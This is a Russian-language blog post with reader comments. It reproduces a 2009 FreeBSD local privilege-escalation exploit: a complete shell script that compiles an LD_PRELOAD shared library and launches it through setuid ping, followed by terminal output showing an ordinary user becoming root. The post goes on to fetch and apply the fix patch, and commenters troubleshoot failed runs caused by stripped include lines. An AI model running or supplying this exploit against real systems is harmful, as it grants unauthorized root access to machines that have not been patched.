Испытал у себя.
cat ./w00t.sh
#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include
main() {
extern char **environ;
environ = (char**)malloc(8096);
environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");
execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include
#include
#include
#include
void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
$ uname -v
FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
$ whoami
denn
$ ./w00t.sh
dev env env.c nginx.conf php5-fpm program.c program.o w00t.sh w00t.so.1.0 FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# whoami
root
#
Применяем патч, для закрытия дыры:
fetch http://people.freebsd.org/~cperciva/rtld.patch
rtld.patch 100% of 846 B 960 kBps
# cd /usr/src/libexec/rtld-elf/
# patch -p0 < /home/denn/rtld.patch
Hmm... Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|Index: rtld.c
|===================================================================
|--- rtld.c (revision 199977)
|+++ rtld.c (working copy)
--------------------------
Patching file rtld.c using Plan A...
Hunk #1 succeeded at 366.
done
make && make install
[tmjn@laptop ~]$ sh 00.sh
ОтветитьУдалить00.sh FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c:1:10: error: #include expects "FILENAME" or <FILENAME>
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
program.c:1:10: error: #include expects "FILENAME" or <FILENAME>
program.c:2:10: error: #include expects "FILENAME" or <FILENAME>
program.c:3:10: error: #include expects "FILENAME" or <FILENAME>
program.c:4:10: error: #include expects "FILENAME" or <FILENAME>
program.c: In function '_init':
program.c:8: error: 'NULL' undeclared (first use in this function)
program.c:8: error: (Each undeclared identifier is reported only once
program.c:8: error: for each function it appears in.)
gcc: program.o: No such file or directory
cp: w00t.so.1.0: No such file or directory
00.sh: ./env: not found
[tmjn@laptop ~]$ whoami
tmjn
и ничего не птчил, свежеустановленная система
А мозг порпатчить надо :( Извините - злой седня...
ОтветитьУдалитьобщий синтаксис С как бы подразумевает, что-то типа:
#include <stdio.h>
долго чтоль пофиксить защиту от скрипт-киддис-школоты? =
chmod +x ./w00t.sh
ОтветитьУдалитьBy the way you have version 8.1, I think it is already patched